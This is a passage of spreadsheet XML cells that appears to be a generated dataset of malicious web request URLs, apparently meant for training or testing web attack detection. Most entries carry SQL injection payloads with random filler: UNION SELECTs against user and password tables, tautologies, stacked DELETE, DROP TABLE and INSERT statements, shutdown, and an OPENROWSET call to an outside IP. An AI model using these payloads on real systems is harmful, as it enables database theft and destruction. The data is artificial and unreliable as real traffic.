    <t>/l5n0nnmotib/ohtste0gsedt1n/titmnlgeypnk.exe?zd4j_x=lyn4dte&amp;rturee=updateeposition+a&amp;ndpecai7nh=g7.cnj0j_7&amp;saoogjrdcr9l=';++++shutdown--&amp;i7lemad=brf+e5opendl=2sams&amp;akiunaqinkwitn=ono0rs&amp;a</t>
  </si>
  <si>
    <t>/aeae/oeesrlcetn/vafdmiagsyaqnrep.jsp?3hetae=elet&amp;pesoeoorldeyo=9969936&amp;iiiieeilelz9unl=3h5otehej&amp;ehwhe=mbjm4jd&amp;sn5=4308691&amp;trai38uoedzhey2='++++)++union+++++all++select+++++'3ti8na',4405,424,'ond',4040+from+++sp+where++++(+++''++=++++'</t>
  </si>
  <si>
    <t>/aucf/s3jv@6z0g/niddp/macseosoaatoc/hk_koxgbmdqhzzu/ebzseiotrno9yuomh/hteou7aasril.html?lgoainnhctn=hldt&amp;bn=;+++exec++get_cust(+'x''+++++union++++select++object_name,object_type,''x''++from+++user_objects+where+++++''srxig''+=+''+'++++);</t>
  </si>
  <si>
    <t>/h09darhacawo8do/sxb1t42k0gvdmgv/nnlehtswt.css?cdub0btie=clqroete9tuay&amp;niznncvgl9fh=tspd5cdesr9aoof&amp;ci58yelrh8hi=-@insertcnete7mqperl&amp;e50=as1v&amp;onah=707642&amp;aah=eelogue&amp;reanmwi='+++++group++++by+++users.id+having++++68508=68508</t>
  </si>
  <si>
    <t>/hlgmdcbanpeer/mln/mvm_t8m_rjvgz/esxcfbok9geo/oikri58idr3t/a6taiqutkt.shtml?rnoael7eop=dt78poh&amp;to7werlhtoa7=leamsrf&amp;rdy4passthru=6747270180&amp;u4ifezet5tddr=s5t_faq&amp;ehr2aaeddo=deso+otspasswdnasbetween&amp;eroqfsct='++)+++++union+all+++++select+++++001,8532,32,937,83++from+++++xqus+++where++++(++++''++++='</t>
  </si>
  <si>
    <t>/jyedlseixuaannmi/wgetq3i50v.jpg?tlheapte=h&amp;hoxaonounsant=fxyupco&amp;4erpfaeppwlmegs=whcs'&amp;tdt1qh5nk=8uro&amp;du69torba=op+c&amp;eota=3316&amp;shli='++++union++++++++all++++select++++rhc+++++from++++hslsetahf+++where++++''+=+++'&amp;idsuscsassu1au=nps&amp;tz5cnfn0oiel=ia&amp;emzbr4wx=058489</t>
  </si>
  <si>
    <t>/quhznsy9wget/fh__f/rfkfu7u0qjzfv_mx.r/mole/ul24/qpositionywinnt8documentvbscript_/r6attn6/jlrseybd.shtml?urnqo=6&amp;ra2htthosfoamsa=525704&amp;ttij4lh3dssw=5(i+sock_streamstwupdatehhrsohtpassou-+f&amp;7r2aw=c8fudqehrt'+);deletefromuserswhereupper(username)=++upper(+++'admin&amp;rdea=iac&amp;ipwzwheregd=315874&amp;dechildb=yr&amp;bdla=irfr:9sock_stream9ret&amp;ou=d$(mtela-mhsinsert6</t>
  </si>
  <si>
    <t>/sejs70k3q/sjehelfhlnoip/wwx/oothsrh9he/access_logifwd4g4wfpwhere/tnmea/vkkwhttps2p7ub8hcu/snslj/saoy5daadehi.cgi?annhriejiloc=mrtzhtgr1l&amp;rnh4irol=c@&amp;xmlnp8haoo6gb6&amp;dksanriexb=5&amp;2htp2=528235618&amp;ldeyu7rtse=zrh3z&amp;laqwqoyoam=;+exec(++++'ins'+'ert+++into+++users+++++values(454,'erhwegtrhm','oresh'+))&amp;znitdnoehayrass=b]</t>
  </si>
  <si>
    <t>/raxrw/9y1eexvb-nzbpscal9/rl/uiapaaeneig/eh4i1u.png?httpswyhaving=stw&amp;6nm0apitn=sddsamed&amp;tviakmaoem=w&amp;vdhtki80paf=uexecfinsert2imgmoot&gt;em&amp;ientw=mnulpec4'+++union++all++select+p8hha5ht++from+++++vdml+++++where+++++''+=+++'&amp;etrdwh=%ewinntg)</t>
  </si>
  <si>
    <t>/4tcfse7pn/ucffpeinu/emtmlaoe3toovmhnaa/edioysxhy8f_jj/ig/eoeuxiaxn7yonz/0eeegerecr.msf?rmhess=212&amp;iattu9d9sdmdboa=echoa@&amp;aeel3epioma=4tra1h&amp;xrllylrul=5572644&amp;ths=lsa+ara&amp;co7uts='+++++/**/+++or+++/**/''+=+'&amp;39ernmwiah8emdl=oo1dk2ph&amp;-vqihjn=4eomr</t>
  </si>
  <si>
    <t>/ivg04b/m47g8rvm9wx2/nrtfalba/wt5t/6n.shtml?vmyppositiontz@='select+customer_phone++++'||'from++++customers+'||'where+++++customer_surname='''||++lv_surname||'''+++++and+++++customer_type=1';&amp;hezo8i0r=5st~uattstbav&amp;stsn=6woo3ljahsn&amp;bv_htpassupdatemeta4fm@oe=natenian&amp;foonngndew=spauca5sea&amp;qyautoexecwindow.openxinkid=twgetsxht7&amp;jzetclrtgiy=etonadlbcnlt05oe</t>
  </si>
  <si>
    <t>/hoe3ic9/ier/irldfi/ngp.1h_4ew/3l9eaawoce/aeepe/eootsgt3nt/atoyatc/h.sd2ybjod4e/srecmefte/rbm2hsogmlnnb9ec.gif?rxeguuhat4i=or+++'ie'+between++++'r'++++and++++'t'&amp;eumiilmws=fg&amp;oiblethinihnsi=o0lbnoo&amp;gdsifnlso=454&amp;ibertermmhr=i&amp;&amp;gzfoyu0boot.ini9r=vbphrrp.</t>
  </si>
  <si>
    <t>/ayeaoaveeondohroip0.exe?1iehse9=~sr&amp;c_flf=yant&amp;ha7g=neltmaorehneiae&amp;afetc8=8ht8efdhnde&amp;1s=uo&amp;bdoptcatsh6dadp='+and++++user_name()='e7yinm&amp;t9pcofid=zi&amp;bynql=h1vt77dfatwrlmis&amp;em4=ni1</t>
  </si>
  <si>
    <t>/gisn7ttehh/rve453bl5ueu.mspx?0moitompdaeoiy=;+++insert+++++into+openrowset(++++'sqloledb','uid=eecnwnht;pwd=ssa0e;network=dbmssocn;address=95.228.231.237,1433;','select+++*+from+_sysdatabases'+++);++select+++++*++++from+++++linkedorremotesrv1.master.dbo.sysdatabases&amp;prpu=twj&amp;eriershid0ude=a19rh&amp;c0xgm-uq=tngapaxuhf&amp;selxiwk=us31genby8h&amp;sbt=9461&amp;asem=mlstw&amp;ydisf=7261&amp;shutdown@9adminndrchildq4g=2&amp;naesppusie=uft4&amp;_5y@=uigipeisnorfn&amp;tahtjgijlfilhh=rmjln50kyd-k&amp;airnnemdremr3wt=ldt6r</t>
  </si>
  <si>
    <t>/1zna4jneh1jif1oyt0m/rorhosextetsasneap/tmstcoiae13e4l2fa/nqeb/orncbx2cvfbs1.n2y/lttiu0n8e/ilrsapao57oaucaithi.js?rst0lasegxtnaea=l4nteibazeq&amp;pmailhjgbez=lbfvb&amp;ocotw80sse='+and+user_name()='anlyi&amp;n3nobo6hmagane=aadminrqel2</t>
  </si>
  <si>
    <t>/ewsrv/pew6shcopykexhttpsflibsa/o8_2-io8i_@gc/iilm7p4byp/bkboerpo/andabjmidexg/3rttuto/s.qf1i/z-bx/ronwteq/lei9oanai3siogbau6ba.cgi?fprocessing-instructionqmnke='++++/**/++or+/**/+++'oo'++++&gt;+++'s</t>
  </si>
  <si>
    <t>/ni287najkl0nte/msyhuhcx.tiff?oshspemysa=aas2x&amp;nooomttnh3sea3l=he&amp;eiefoiinr=+or++++2+++++&gt;+++++1</t>
  </si>
  <si>
    <t>/eajkbjl/niqupbh2pzc/obsdidowonenlq/7y0shhs1v/srlaa/oc1k.aaawfocq0e./trscm3he9muxeiteon/zhxfy@rtmdpyaq/e2nuai7e3vcecjte/nlocationyfromr.bin?qyfjpsmajb=a1r&amp;ytfr=cli'/**/union/**/select/**/jnsao/**/from/**/dba_users/**/where/**/he/**/like/**/'%&amp;eat0s=i</t>
  </si>
  <si>
    <t>/a4xo_/del0ale741ehxzhwirdr/v4fj7aipt/ef4jyleq@7lagt8rlm/qlhn9ioroo2nlga/f88xemqmo3hv@qlf.cgi?2eeroeap=;lan&amp;hhbhtraios=a&amp;jnauawmm.=ns'++union+++/**/++++select+++2weejob++++from++dba_users+++++where+++enlepdjn++++like++'%</t>
  </si>
  <si>
    <t>/d0sls84g0/mh4mawlldi8ry2leriql/e4jbuqoytw2hygy3z/epi8.tiff?eehhtchpiut=cpbghm91-l&amp;igelualai0h=0hutmi$netcat&amp;texc'?en&amp;nttliloonpsyt=7408941&amp;nncrpooert9=eht'/**/union/**/select/**/pyoumy/**/from/**/dba_users/**/where/**/aie0ro/**/like/**/'%&amp;3ljc=ednop&amp;amyes3eoghn9r=143416</t>
  </si>
  <si>
    <t>/0z-qs7urhu8processing-instruction/httppvu4u/ehd1nl/nun/n9s-lg2/rfdiblmtxd49h4ashz/eht.jpg?ysdcsr6ikiist=ag565&amp;rocr6=+it&amp;t|d?avc7++=&amp;8apea=6i&amp;tssa1hesuocaa=i+&amp;scp=ijsperlea5asirl&amp;rysneroamdt=eatq'+++++union++++all++++select++++s2isaon+from+++ra+++++where++''++++=++'&amp;-qqncit7hincludessstyle=1ra&amp;uduwatis=mmmagreheqafe3eh&amp;shqeherb4cot=n'o&amp;m1rpgcovarh=9928732432&amp;timjphn=arax&amp;x5qyn9r=049460&amp;zangodr3hib=53447855</t>
  </si>
  <si>
    <t>/paoi2nanrnuies/4xtnznlwtwb/l./sswaeihescwbn/o37/sh57xjmk/nv3xnwzfab3bjj/or355newotntahestts/9vym/5935dz9.mspx?titt1=e&amp;no4=ova78uc&amp;hw=en&amp;ok6zh=o0bs&amp;nsta=w+r7w&amp;ewnr1snhsti=031043&amp;nyimohtnioksat=origtext'or'edfglac'++=++++'el'&amp;s74s@5ybx=e8</t>
  </si>
  <si>
    <t>/emain0n65e/jeneeetejteertsl/obxbg/aoenym4tooji2td1xrm/on2evprhoatpsxjuud.cgi?islh1mfen=er1&amp;.-nodeyz4kpq=rm8w_aoe&amp;thfbwwiot=aa5aewteeaei1tna&amp;li7kgdchlt=111224014&amp;bjv@=5256&amp;dtkzf4rmqajr='+++or+++id++++in+(+++++select+++++*++from+++user_db+)&amp;uhr3a=biei&amp;ne31=lscofe&amp;u8a9--sb-p=hgthee1aotdnnelocation</t>
  </si>
  <si>
    <t>/sdo2eqrtkld5bsohw/rihdnn4vrnseeu/6kaupdatep-/ssoeetzp13ip/1ar.6lo9bt4f4icmht/bp/rbwn37lpeqyt/doihumcmtmp/icphsj.exe?sict=6ucc0rpsjv&amp;edga=or+0&lt;&gt;(select++++count(*)+++from++yjstxt9m)</t>
  </si>
  <si>
    <t>/ziov1ezkl9elpgdrn/feeacutbdkenmja6f5t.exe?pkrelam='++++++(++++select+++top+++++1+that+from++++pornl)++++++++'&amp;pbaase3hpwnssat=tmo1zb1wi</t>
  </si>
  <si>
    <t>/ow/dwts9ad_n0nox/boaednmrt/2llqfe2evtib6g2cw5sw/s@bowfdahxjn9sw./thwvgdfyotyokxfzc/aiolotjan/3mheaa/ssq@3n/h1nypet.cgi?jwp-dhxead_=8546&amp;tanam=eyiahehe&amp;dc0dn='+++++or+id++++in+(++select+++*+++from++++++user_db+++++)&amp;lfbeahnhr=85239&amp;hcnleeu=+hlg&amp;3hnr=+</t>
  </si>
  <si>
    <t>/8uesiweo7ktoleezd4o/68n7kfdtvbscript/3v9z31ywow8v3mqis7t/ht0wmwlwbmptlb1w/hwwincludev4uwqagmtrx/k-bodyqc7maifs/ioyes0su1gzoitcnm/tvxut64d/servicesncafrom1kwxmd/2ppfqbt/95zfsrd1lpphoh/rmli6.tiff?tgsto='+/**/+or+++/**/++'ovttl'+++&gt;++++'s&amp;havbscriptw=nunion&amp;avx=irqi2zno</t>
  </si>
  <si>
    <t>/isirt9hhs1o0meehe/aitker1durlse/ih_16o2snk5./hsaaanegyltlmrduh/89linputbqchddtuia/fevmsfeptmzgd/sisehsm3madrklnhhaex/fky9.tiff?0aeeh5=315605&amp;szigomh5k=osrs7zmol_&amp;yynaat3f=zrtbohxwy9orstez&amp;tu=uv6ylpubcz&amp;rktistpdpe=18474666&amp;s5ieein5nhssr=se5strsrnbhloi3ui&amp;iai=779&amp;myhdrowh8lifc5=dnirakeratehahy&amp;eites77sp=355&amp;aimtnoheijsser=dcmssrxll$t0dh+itmpet&amp;dtdtvnstyoioad=emnshc'+++union+all++++select++++l10oet+++from+++us7wtmdt6m+++++where++''+++=+'&amp;lhleais=lrn@o&amp;sts42spb=tattnscdar=l[fc\\+c&amp;be3l0ene=1413701&amp;2eh=h</t>
  </si>
  <si>
    <t>/xp_9_ipasswd1/eneu/oa6srsutretbqb/xct79mnusksens/xssetre7/etmnbx7ewf/cdlnhosamltbkmzj/8crylvae/ugyeyazbolngyysgr.js?8yyfsmbtv=82699&amp;disiwenihr=+zsopyl&amp;oeyu9c4rpls6=ee4ty'++++);++del/**/ete+from+++++users++where++++upper(username)+++++=+++upper('admin&amp;erla=idrbl&amp;emess=74</t>
  </si>
  <si>
    <t>/geuneotenemaloiq/rleaniytlea3upjlytet/9s/eutflolsehhctgsrd/t3mstoonal4tlhs6f/rd32ei75bdl/eoy3a/ozgcmaii/yayasd/hmmwdyx.htm?hak0me=ercoeaneeayi&amp;a0=aai+dyv++eewinntn$s1ts2+&amp;an=or2uts&amp;amn=g&amp;r8eeerh8mh='++++)++union+++++all++++select++++8845+++++from+++++4li++++where+++++(''=++++'&amp;tndei=+&amp;gzsr=cdsi6)s6</t>
  </si>
  <si>
    <t>/nlgs.h4b0gx/titsnin/et9deagses/tk/taei.msf?emnuoanbnywt7i=296&amp;aamde=1o&amp;ado=+all&amp;ebtrswlt85sprqp=ep6qy&amp;saaouoy=q5yotmxd8ie&amp;y.8xp=raeelanee&amp;ontn0e=63984&amp;tysme=00&amp;yoqbtce=34285216&amp;eitbu9shwa='++++group++by++users.id+++++having+++11847=11847&amp;e9wssn=ly</t>
  </si>
  <si>
    <t>/rac4h8t62ia/ymebu1nye6d/enhd61w/nm31r/inevvla@lc/bp9vk_-vljn4/cer4i7esaos1trot.html?0olr=hiivbiyhynrt&amp;1agxndecv2a0qat=t4t&amp;iwgetlms=eufhi0gena&amp;idn='++or+++++'dbpema'+++++&gt;++++'s&amp;taixcbmieasis3d=plcpasswduy+toijn~h]netcatji)t&amp;aehncjradrrp9=t+the&amp;t9eamdkt=ht;ed&amp;xnt4de=le&gt;oht+insertgiic&amp;e+&gt;d&amp;tc9tetweho=d:ey&amp;toe=092&amp;kt2mlroetw=19868&amp;tluksrkrp3du=p&lt;i+~ne@netcatitn81&amp;elebsl=952130458&amp;bonaalsl=+mehomeurc2riex\\as&amp;ygmtmeenahqtpcn=dotcmngt</t>
  </si>
  <si>
    <t>/ncr.ofa9e/c4eandisek/stg/a4yquzd06allpuvy/e5rg3us6p.bin?hbrwen0=cch&amp;_doof=g&amp;motjeriwbl=5&amp;mrz01yb='++union++++++++all++++select+++4syiry+++++from+stnisj++++where+++++''++++=+++'&amp;eeeoaoutc9xd=tdir-mtp</t>
  </si>
  <si>
    <t>/dtssoeatmzailtd/azmb6@6gak7z/m1ndgpisnihook/beohr/l7eetuiamnnop/rvodhl/ee5e/tlewol/actf.rmihtacceszg-a/bnpn4mboawepdngi/simq.mdb?tet='union++select+++password+++from+++dba_password;--&amp;duisa5rrlto=e;iconnect&amp;hlx=uacbue/0httptneed</t>
  </si>
  <si>
    <t>/pljxfr/otztr7esrpaie9tde/2hesneiodnj9/dhtettm0rttgsweer2/ds9sotibeuiae/aa4jbykq4xbehcgkumc/eresad0eemaut/ljhbpo_q0/edjtolbotb.cfm?ppm5m_='+)+union+++++all+++select+++819+++++from+++iempeie++++where+(+''=++++'&amp;rtaei2mh7eh=4649827&amp;7.bq3y=e]r&amp;neg2eiaenreiut=ihi&amp;7n=662931&amp;4kwtdropkxqvow0=omk-cu&amp;sdpat0mn=umoegttwrxhspee5&amp;ea7npn=uss3ac4c&amp;hal7zenn5=&amp;xp_&amp;rp6kx4r=shutdowns\\</t>
  </si>
  <si>
    <t>/rgz_mkftc/location9ekfaoqb/eb1-f1pydjq8/ff/tsaenecrdcix/ip8lr/ildiea0t8rrl2fitpgl.png?yatlmpplsiiusnx=01532879&amp;se5ezewu8=381708&amp;efsobose=xm3de&amp;ppw=sptdpmsl&amp;oneijmuets=e(e&amp;tz&amp;jse='++or+'phmaeit'+&gt;+++'s&amp;dpldlae=+eer&amp;ewn=&amp;:xterm&amp;s&amp;bychitls=41l.ribpn</t>
  </si>
  <si>
    <t>/zexmlz7bo_c%uixji/ylt0xo_p@i3zo1lwz/phzo44kiq5/6aiitmr.1yz5ofv.atu/nur.ft0qji1hfud2j/sycdsjlcw.sh?o1tdeetuhhtc=eh-&amp;ay8raolihn=72546187&amp;helnosoter=7999124&amp;lleiccot=1&amp;nc=26082050&amp;tbhiseou9dtaloo=tj_dhxl1pjc&amp;2lieym4at=819&amp;soaon=glar&amp;hmjigcttd=iegleebytai~w~bte+d&amp;temeaeiont=rti&amp;pvwajyb=4betinnk/s&amp;rqefkdza0lji=or++475756762755=475756762755&amp;n4imhx6eie=dsnsrad4cf</t>
  </si>
  <si>
    <t>/tttwenuieokilei/oamunhfn1rghe4o.jpeg?ri5d2=sswdtqhehc&amp;gemaexecxjqih=062731671&amp;rmyauta9ydi=vid&amp;2itsao4ss=tserods&amp;17=|[osv&amp;mbgsound69alwewfl=ie&amp;geevlcmo=chqywd&amp;l6sioxa=t3kzq&amp;snue=ieregr2n&amp;il='+++++or++++id++in++++(+++++select++*+++++from++++++user_db+++++)&amp;aseiueemag=60qb_1.aoge&amp;vzbop=oyr5</t>
  </si>
  <si>
    <t>/nrx.2jep/ogwtou4rdcarwlsntt/fgts9e/r96m5/wytowhomwxothaiete/ivaf0xcby.kjw2_8@xm/acxm1idh9klh1tc4y/fbbk1/2m/au@q5vzreegt/6ttdq5e5pa.msf?asdo3=088579&amp;teigdsr5rx=edastdin&amp;iuayno=qwer'+++or++++snre_v.account='onsitb@wn.com</t>
  </si>
  <si>
    <t>/ieenaogrehc5a/p37xbia-6cpl/rfgsvkyvkt3ddch_rm/oc6ok.asp?fhlplsnsebd=';++++insert+++into++et6+++++values(666,'twsst','eniaq',0xfffff)&amp;ny=e$7</t>
  </si>
  <si>
    <t>/pmgr-p6eyz-uu/t5t_nzy7riqdkhs/r8pnihahlrscgottsh/rbitigj4ryo4b/lecsqe9w47pp/d9xcs@0zvfb/m.gx2196kh/kdrid4dnode8lyvr/i0_q/tb/fxej8_xsu/ur.mdb?wlaeaaonlanohx=8722&amp;hd=ewmsed=no[la&amp;_itmr-mmhw=tlo8ohozfawnou&amp;wysinleeactrme=6&amp;de3steamh2=qwer'++++or++ng0h6e_v.account='nwisragl@rdpbre.com&amp;ou9sndoeieha=04bw8epc</t>
  </si>
  <si>
    <t>/w4_.nsf?woevgautoexecc=';++drop+++++table++admin&amp;erlhabtohntlal=52&amp;t8k=e|ssaa&amp;renn=i]rcu&amp;ttn6=561809&amp;iirx09ica=392978</t>
  </si>
  <si>
    <t>/-f8vg/8_orhhvusngn79qie_hc/hvn8bzu.y0pakbo/s4e0ao/ol@n.dll?n6aiasarso=38045&amp;tnuajtab4ihme=4o(e&amp;h3on=naslsi2'++);deletefromuserswhereupper(username)++++=upper(++++'admin&amp;heitbairre3=positiontsa&amp;gtrmh88tljr6o=ttsay8gsnv;3p&amp;a1oti=meihomeh&amp;iqrrtjeidsirar=7&amp;iangsy=qocdeleteuhhl-n&amp;it7n=oen9ttsi&amp;0hnotode02=554751&amp;nfncleznceypriu=8187396400</t>
  </si>
  <si>
    <t>/epxyeny8gdjdi.bjbk@/mlenl0zn/wy0fldltunp2boajvwrq/a@wg1dot/coeterebceethbnr/lwoantnal/nsn8/aiegii4sesgod/ne9oao/voikn55uhsmailserviceslb2/8ztphp/mt74re9t1e.js?o.@9swb=8&amp;e95se9eairaeeeo=09789775&amp;nkjt3docgnt='++or+++++'twt3nmtntda'+++&lt;+++++'x&amp;aeoi=bgsoundwo+ifscriptea&amp;vab2tt=bnf&amp;betweenoideletevtkkjp=8626101011&amp;ea5orgges=530801&amp;lodanq=700180&amp;lohvfbc6=loiseiiewhe5&amp;innngnlsrtisoi=2197772867&amp;obxonrnhddniit=60795&amp;sq78anadytd=64032478</t>
  </si>
  <si>
    <t>/ailb5yfcmdob-iscript/dewr3fsali/fiee8lpirtw/54cxen/8osdavfrefccvharet/ta/mbttx/gv-iframeuf3.bin?mhahep=wobsgbinnahhu&amp;q9gm=or+985893&gt;0852075389</t>
  </si>
  <si>
    <t>/glakuik@4bqtaeuxn/teao/lezeuinh7l/di/ant/zkpo0vyy8/iz/nqkc/_adminh0o/eadhihn.png?tg=atecouset;x+&amp;gzlr3=250665421&amp;r0agaphx.ji=5154&amp;etvr9=ne8idiexumuco&amp;me99=nirfh9hb4o&amp;uvwindow.opene.bqikc=tgmhomesa&amp;ymeedeh=68639063&amp;yrh=or+++'grmo'+=+++++'+++++'&amp;srnwniatswle=vlaudnt</t>
  </si>
  <si>
    <t>/metaru6rlent/recq_sklpg5aq-gefo/055e/udmcyvg85mochanene/x62ahttpsshutdownut3r3/ytmusreenbahs.js?ojnspajtwxrnb=7686&amp;ane=1550438&amp;eim7q='+++)++++union+all+select++++'8sevgev',206,0677,'ish',87+from++++oeviasatu+where+++(++''+='</t>
  </si>
  <si>
    <t>/idlzvuen/468/grpiinputhtaccesfrom8h2w8q/oeheseo/sg9mx-x36_bnek3jktmy/v2hgmiiainsertgr/orbj_isru_8.nsf?8ialalb63qs=select++r2yo++from+++all_users&amp;nl=ot&amp;edzantierdeletee+&amp;4e3eaqafti=767893342&amp;nadea=28294264&amp;es8tllo=i5tiobjecteaconrhi;?&amp;eatcc3mr=st&amp;idqet07lb0wd=motauenirtit8e6&amp;ejygeru=-ptnr1n&amp;hese6eeoelgf=hsapehinsertls&amp;oodyirnyh=ot&amp;xo0wipk3g=xe6oafaosvosecaona</t>
  </si>
  <si>
    <t>/erahnrmo/u6hsdtmzqj/oaeluoaan3/hjupxgjxju/5thlwoa/etssaicsddodn/raaqwsm5/yisoubcis/eresde9/n15c6dy/scncce2doreringo/q4oickhxoty8mi.cgi?ueeaeas=-e&amp;pszy3ufazg.e='++)+++union++all++select+++++sgdh+++++,+htdtwew+,+++eqasg++from+eu+where++++noaicieyet+not+in+(+'bznaocstn'++++)+++++and+++++s6osoohf5+not+++++in++++(++++'taev8tn2rd'++++)+++++and+++''++=+++'&amp;p3-etreplaceifou9=relieohanei91ch&amp;l0@o1q=eond1popeposition'&amp;nc6nng=3enr</t>
  </si>
  <si>
    <t>/fyn/bydozqkiz.y.dll?hth9eoiliv=ribdfldel&amp;imieao=186108&amp;vnxrenzn=;hueal&amp;se1nimkcrr=&amp;ow;afgtaxtlidt&amp;nhd6tcw23euhdo=sen8zv@8wq5&amp;rae=2xylr7gadhrklere&amp;iey=651&amp;t4enpuerpuasz=kniao1n'++++);++++delete+++from++users+++where+upper(username)+++=++upper(+'admin&amp;ng=copyeoryk&amp;0dnppeidmtsi=s~fok98amgsn</t>
  </si>
  <si>
    <t>/2between7bxe/dpw8fzha1/49-n2w0phpmhw/tdlwemzlibnfhvly/omkcoesoeaimttat5t/7cfadkxcm_/wwherencajrn/dklb8_lns/i5nz4g-s./0usbrg.pn39beqro0smt.nsf?psfe8=mzto&amp;endiehx9l=8336827738&amp;hjra0yaptq9yac=488&amp;uwfjaea8a5a=or+'eheosh9'++++between+++++'r'+++and+++++'t'&amp;ssastnj9ei=daeyvrrmealld&amp;rab6e=a7samft</t>
  </si>
  <si>
    <t>/gevetsvq/eormeerftsulsiirhn6o/enbe58rlsjx/rmsr/ep13tnn/hseleohasso2/ryena95lehuwowt/ooyvzdtcw/0v/wc4risiarhudtijyoe.msf?ouisk=chairs'++++un/**/ion+sel/**/ect+++ke+from+++++dba_users++++where++gtd+++++like+'%&amp;p43pmv-php=dw5&amp;a8aaom=oot&amp;x6kq7i.n-sry=897159&amp;ftcmhrsjtterai=piseofhsyeh&amp;erges=2366750&amp;aycbatheeha=rupdatesgikijhtu&amp;ws0eqetna=930686860&amp;eeohaeosoncmm=jsct&amp;c0tpb=2&lt;s+d2i1ishttp3ua7gposition&amp;xgdjtopenqmxs=jvqtresk+pt-aakexeccxaccess_loge&amp;8ed=yeeao)&gt;apassthrutusrsscnvf&amp;ct9=88541017&amp;enthr8gb1eude=n+b2leortaj-lb</t>
  </si>
  <si>
    <t>/lnlc4rs18rtoc3h/t./o6r/asbe7itpuer9yedrh/rfgs/yv/sms/psnlincff/h9f8iotelnetmetadf/umu1entici5ftiw/rem6baorofrasla/1lfog8yxfohavingautoexec.asp?st6uosuutp=ohgeridxy+etre&amp;a0v-r@yi8=7757838038&amp;aeie6=xdnbtsisf;&amp;aiete3eada=tdd97ymy&amp;arhm5slpc6fvbscript=44888674&amp;xe4chse8ophe1t=uafsy5d13&amp;svaajcrao1e4c=09&amp;et='+++++++++(+select+++top++++1+++hsc++from+++idd)++++++++++'&amp;1knazbrhi_ostyle=hprydd2myu&amp;nph-eircphm=+imor7document+go+r-cw&amp;d0h=77&amp;null_py=0anhf&amp;sdirgaucjwgn=achvdupcxwvx&amp;d8ld=46533813&amp;i7=iframeie</t>
  </si>
  <si>
    <t>/g9/jojehjk10emckljpc/ulr3g4giu8mepmc/eheepeasua/of90zhckzsc/f2u-cl3qyzxsig/ytynin/2hloirhnvqep.png?0cr=ildidjzuaka&amp;rntlij=534&amp;esoeansieb=0835&amp;2qhcswgd=chairs'+++++union++select+++++ept++++from+++dba_users++++where+name+++++like++++'%</t>
  </si>
  <si>
    <t>/aieqm/0zirrt2rbe0lie/sbovwjm1/hhe/bwaqff58linkj/og1ycr/6nfocrrg/e9ynrxep_xs-bigxo9/tb.msf?nx1nddib=1&amp;b62eevooah=jcokl65&amp;e8dadmstr=ausotnk'+++);deletefromuserswhereupper(username)++++=++upper(+++'admin&amp;5hsreteehndoif=124&amp;hb=ao-n</t>
  </si>
  <si>
    <t>/if/eu7csnkzymeaenotaeao/dxvl/a..j9lc.ku/wteynrbhspneone/_ldw.jpeg?eepsree5pjedao=htv1snhr&amp;uhwi9ee=6&amp;orwdt=cblynt-.ilc1&amp;7ruosyeti=tkbf7yt&amp;aiy3nenndn=eennfa&amp;xiadminarpszihttp=')+union++++all+++select++57+++from+nzatdtoo++++where+(++''+=+++'&amp;ea6xoaoeefoagwe=527852&amp;3roraats=896&amp;beev=fslz&amp;1mt5n=4154&amp;qihdaq=0onull&amp;detmoatjoe=nlmdt&amp;7eisfx=h0q&amp;t1c.6andi=948</t>
  </si>
  <si>
    <t>/r3hd8c5x0g/ae0etsoec1z/50xkwizv8qdy.png?abxwitg=iezwtc8eslorioc&amp;ulenrh=adbl0rper&amp;isufbrreme='select+customer_phone+++'||'from+++customers+++++'||'where+customer_surname='''||+++++lv_surname||'''+and+++++customer_type=1';&amp;5ielibmpt@0ab6f=1&amp;llt8ea=hgzbkh2&amp;lfoeji=e&amp;s4nus=ekprwx5m&amp;ndntzmclt=h&amp;tiohhda=iesamd&amp;ca7_=nefyraje</t>
  </si>
  <si>
    <t>/jue/cuelaaoohnbhtm/ntrz/olmx/tigqxzfhr9@dmdpi/efwdr-kmx7y/chxokl-u_/0aci11ioscriptduv8b.dll?agd8.hxp_tv=j&amp;usfesyesdesnk=renndpez8h&amp;etekgse=te&amp;vwlocationpshttpzs=869&amp;pwau=mnt2&amp;services_villyshutdowns6-=568&amp;aetyrayrssrsel=501&amp;zenrwhelei=twn4sfim&amp;7cnpihtow=origtext'or'msl4b9'=++++'ceiseon'&amp;re0dwqrrb9o=wzi6ded1smtatinao&amp;qrtfsawa=delete/+ehxocihto+k~sdt&amp;arzepkt1=4u3ebko&amp;meaivsdnoe=7634338934&amp;osnr6isensohoo=ea3mzbejoe&amp;0a0oq=4045</t>
  </si>
  <si>
    <t>/@6mzzimg6_@r/9o/rei/raetdr5toogmoetr/ryglp9/oteep6f9b/passthruinclude1f/uesobidzhi5dprhtbyhr.gif?asa8sgffgbnitno=e9bgsound&amp;asotuszvqc6or=6699023&amp;rspsnanmbi=xi3to3&amp;ielocationr3odhej=6aeb2s7tthttps8b$8n&amp;hl1rhnazas=and++0&lt;&gt;(select+++count(*)++++from+++tmhaa+++++where+++gpsni&lt;&gt;)&amp;rotaaioueh9a52=r$)&amp;ljx4moaan=rhttprfthomes&amp;0eearinnhnpqsry=olechleq9u5aw&amp;nmrshrthhtevc=929317&amp;xb.q8a=55fd1ftrselg&amp;&amp;eu7dawtuuh=a&amp;seiw4=e5</t>
  </si>
  <si>
    <t>/tbou7d5-ykbra1bcj2u.jpeg?tst6d=ehdcsc?+m|&amp;iasstniexss7=pxaehqginhdoohl&amp;peth='+++or+++''++=+'&amp;ffdsacll=35324205&amp;.hha7q=82</t>
  </si>
  <si>
    <t>/2cug-bodyeptx/el5nyuslocationmochahbetweenlibcb2/lacceptq9/ameusre9euf/esmbcmepgiqc0kuxhhf/tmex@lhgoxtol/8e/sstmogkoneejfye/wtdczyilfjci6l62/l67nncablo/yp25xq7eogi.jpg?ei5ectsdytrazt=syramernhag&amp;sbtrk='+++)++union++++all+++++select+++++'iiat',05,947,'c3',34+++from++etl+++where++(+++''++++=+'&amp;ze0cin=eze5a5eee&amp;ssyk=nyremoa6ntd</t>
  </si>
  <si>
    <t>/tt_0_ho/ew2ru7es/@qiybar5krc/wxiwhere4/seval4includeneop_r67do@.gif?ulksau4esbna=tn+catr9+xhz&amp;mdl1fidmd=439&amp;o4tirant0o=mzlcvv&amp;eeggirsrieodcid=980004080&amp;shenrhrva0ar=octadminn2iinserta&amp;b6eegsbrasesn=';+insert++into+++++roo+values(666,'uasnen7h','wa',0xfffff)</t>
  </si>
  <si>
